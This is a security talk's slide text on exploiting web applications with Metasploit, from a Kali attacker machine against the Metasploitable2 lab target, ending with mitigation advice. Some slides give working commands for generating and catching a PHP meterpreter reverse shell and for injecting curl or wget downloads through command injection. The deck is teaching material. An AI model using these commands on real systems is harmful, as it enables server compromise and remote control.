The document discusses exploiting vulnerabilities in web applications using Metasploit. It describes using Kali Linux as the attacker machine, Metasploit for exploits, payloads and establishing sessions, and Metasploitable2 as the vulnerable web server victim. Various exploitation techniques are covered like SQL injection, file uploads, and command injection. Metasploit modules, payloads, and usage are also outlined.

1. Dennis Maldonado
@DennisMald
2015-02-20

2.  Application Security Specialist
 WhiteHat Security
 Full-Time Student
 University of Houston – Main Campus
▪ Computer Information Systems Major
 Twitter
 @DennisMald
 Website / Blog
 KernelMeltdown.org

3.  Kali Linux – Our attacker machine
 Metasploit Framework – Used for exploiting,
generating the payload, and establishing a
session with our victim.
 Metasploitable2 – Victim Web Server

4. Exploiting the backend server through a web application.

5.  Reasons why hackers want to compromise
the server:
 Run attacks against the internal network
 Use the server as a bot
 Install backdoors onto the server
 Reveal sensitive files/passwords
 Execute any local file
 Execute remote files
 and more…

6.  Vulnerabilities that are dangerous against a
server
 DirectoryTraversal
 Local File Inclusion
 Remote File Inclusion
 Remote Code Execution
 SQL Injection
 Command Injection

7. http://website.com/?page=index.php

8. http://website.com/?page=index.php

9. http://website.com/?page=index.php

10. http://website.com/

11. http://website.com/user.php?id=1&Submit=Submit#

14.  Metasploit is an open-source framework used
for Security development and testing
 Information gathering and fingerprinting
 Exploitation/Penetration testing
 Payload generation and encoding
 Fuzzing
 And much more…

15.  Command Line Interfaces
 msfconsole
 msfcli
 GUI Interfaces
 Metasploit Community Edition
 Armitage

16.  Modules
 Exploit – Exploitation/Proof-of-Concept code
▪ Ruby on Rails exploit
▪ PHP-CGI exploit
 Auxiliary – Misc. modules for multiple purposes
▪ Scanners
▪ DDOS tools
▪ Fingerprinting
▪ Clients
 Payloads – Code to be executed on the exploited system
▪ System Shells
▪ Meterpreter Shells
 Post – Modules for post-exploitation tasks
▪ Persistence
▪ Password Stealing
▪ Pivoting

17.  Active Exploits
 Actively exploit a host.
 Ex: Ruby on Rails XML exploit
 Passive Exploits
 Wait’s for incoming hosts, then exploits them
 Ex: Java 0-days
 Exploits contain payloads

18.  Inline (Non Staged)
 Payload containing the exploit and shell code
 Stable
 Large size
 Staged
 Exploits victim, establishes connection with attacker,
pulls down the payload
 Meterpreter
 Advanced, dynamic payload.
 Extended over the network
 Extensible through modules and plugins

19.  Types of connections
 Bind
▪ Local server gets started on victim machine
▪ Attacker connects to victim
▪ windows/x64/shell/bind_tcp
 Reverse
▪ Local server gets started on attacker machine
▪ Victim connects to attacker
▪ windows/x64/shell/reverse_tcp

21.  CVE 2012-1823
 DOS attack
▪ -T 10000
 Source code disclosure
▪ -s argument
 Remote Code Execution
▪ -d argument

22.  CVE-2013-0156
 Easy to find, easy to
exploit, critical
vulnerability.
 Requires just one
POST request
containing a specially
crafted XML data.
 Send commands
through YAML objects

23.  The upload functionality allows for any file
type to be uploaded
1. Upload server-side code and check if it executes
▪ PHP = <?php echo “HelloWorld!”; ?>
▪ ASP = <% Response.Write "HelloWorld!" %>
▪ JSP = <%= new java.util.Date().toString() %>
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the
victim
4. Upload the shell and execute it

24.  Allows an attacker to execute system level
commands.
1. Attempt a safe command
1. echo test
2. uname -a
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the victim
4. Inject curl or wget commands to download the shell
onto the victim machine.
5. Chmod if necessary and execute

25.  msfpayload php/meterpreter/reverse_tcp O
 msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3
LPORT=1337O
 msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3
LPORT=1337 R > shell.php
 # Now edit the shell.php file to remove the comment on the first line and
add "?>" at the end of the file.
 ==================================
 msfcli multi/handler payload=php/meterpreter/reverse_tcp
lhost=10.211.55.3 lport=1337 E

27.  Keep software up to date!
 PHP: 5.4.3, 5.3.13
 Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15
 Use whitelisting for file upload extensions
 Watch for extensions and content-types
 Don’t let upload directory be executable
 Rename files if possible
 Don’t pass user input as a system command!
 Use library calls when possible
 Sanitize input

29.  BackTrack-Linux
 http://www.kali.org/
 The Metasploit Project
 http://www.metasploit.com/
 Metasploit Unleashed
 http://www.offensive-security.com/metasploit-unleashed/
 PHP-CGI Advisory
 http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
 Ruby on Rails Exploitation
 https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-
metasploit-cve-2013-0156
 DamnVulnerable Web Application (DVWA)
 http://www.dvwa.co.uk/
 Metasploitable 2
 http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web